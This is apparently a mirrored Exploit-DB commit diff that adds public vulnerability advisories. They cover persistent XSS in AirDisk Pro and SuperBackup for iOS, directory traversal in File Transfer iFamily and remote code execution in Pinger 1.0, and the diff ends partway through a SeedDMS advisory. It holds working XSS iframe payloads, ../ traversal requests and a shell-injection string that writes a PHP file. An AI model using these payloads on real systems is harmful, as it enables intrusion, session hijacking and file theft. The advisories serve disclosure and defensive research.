bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-04-16

Browse source 
9 changes to exploits/shellcodes

BlazeDVD 7.0.2 - Buffer Overflow (SEH)
AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
Pinger 1.0 - Remote Code Execution
SeedDMS 5.1.18 - Persistent Cross-Site Scripting
Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
File Transfer iFamily 2.1 - Directory Traversal
Xeroneit Library Management System 3.0 - 'category' SQL Injection
This commit is contained in:
Offensive Security 2020-04-16 05:01:47 +00:00
parent 0137126a8e
commit decb2a46ee
10 changed files with 2363 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

417
exploits/ios/webapps/48321.txt Normal file
View file

@ -0,0 +1,417 @@
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A
Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2203
Common Vulnerability Scoring System:
====================================
4.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.
(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.
Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerability has been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via airdisk pro ui to malicious persistent script codes.
Thus allows to execute the persistent injected script
code on the front site of the path index listing in the content itself
on each refresh. The request method to inject is POST
and the attack vector is located on the application-side. Interaction to
exploit is as well possible through the unauthenticated
started ftp service on the local network.
The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location with the popup
that asks for permission to delete, allows to execute the script code.
The injection point is the file parameter and the execution
point occurs in the visible delete popup with the permission question.
The request method to inject is POST and the attack vector
is located on the application-side.
The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] AirDisk pro Wifi UI
Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1. Create Folder
PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257
Note: Adding via ftp on mkdir or file is as well possible without
authentication on default setup.
2. Delete / Old Popup
PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
<div id="modal-title"><h3>Delete File</h3></div>
<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
<form name="input" action="" method="post">
<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
<input type="hidden" name="ID" id="ID" value="test">
<input type="submit" name="submitButton" id="submitButton" value="Delete">
</form>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699
Note: Comes up when somebody tries to delete the malicious injected path.
3. Devicename
PoC: Vulnerable Source
<div id="headerWraper">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
<td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>
</tr>
</table>
</div>
--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612
Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by the local or remote users.
Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all
inputs and filter all involved parameters to prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction
by a secure parsing mechanism.
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

306
exploits/ios/webapps/48322.txt Normal file
View file

@ -0,0 +1,306 @@
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A
Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2202
Common Vulnerability Scoring System:
====================================
4.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.
(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site web vulnerabilities in the official SuperBackup
v2.0.5 ios mobile application.
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject own malicious persistent script
codes as vcf filename to the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is located at the vcf
filename or import. The execution point occurs in the main index list
after the import or insert.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] VCF
Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)
Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting
vulnerability follow the provided information and steps below to continue.
PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>
PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>
PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"
PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD
--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close
Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values next to add, edit or imports to
prevent an execution
2. Restrict and filter in the index listing the vcf names to sanitize
the output
Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

245
exploits/ios/webapps/48327.txt Normal file
View file

@ -0,0 +1,245 @@
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2199
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.
(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
ios mobile application.
Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches a final slash to its request and the path can be accessed via
web-browser to download local files.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.
PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../
--- PoC Session Logs [GET]] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host adress (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and
accessable ./etc/ path in the app container.
Disallow path changes in the client-side get method requests and
validate them securely.
Security Risk:
==============
The security risk of the directory travsersal web vulnerability in the
ios mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™

75
exploits/php/webapps/48323.txt Normal file
View file

@ -0,0 +1,75 @@
# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
if(isset($_GET['ping'])){
// if this is ever noticably slower, i'll pass it stuff when called
// change the good.xml to config.xml, good is what I use at $WORK
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['ping'] == ""){
$host = "127.0.0.1";
}else{
$host = $_GET['ping'];
}
$out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
.' '.$host.' | grep received | awk \'{print $4}\''));
$id = str_replace('.','_',$host);
if(($out == "1") || ($out == "0")){
echo json_encode(array("id"=>"h$id","res"=>"$out"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
if(isset($_GET['socket'])){
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['socket'] == ""){
$host = "127.0.0.1 80";
}else{
$host = str_replace(':',' ',$_GET['socket']);
}
$out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
$id = str_replace('.','_',$host);
$id = str_replace(' ','_',$id);
if(preg_match("/succeeded/",$out)){
echo json_encode(array("id"=>"h$id","res"=>"1"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
?>

352
exploits/php/webapps/48324.txt Normal file
View file

@ -0,0 +1,352 @@
# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A
Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2209
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web
based user interface. It is based on PHP and
MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
development has made it a mature, powerful
and enterprise ready platform for sharing and storing documents. It's
fully compatible with its predecessor LetoDMS.
(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
https://www.seeddms.org/index.php?id=7 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14,
v5.1.16, v5.1.18 and v6.0.7
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site web vulnerabilities has been discovered
in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
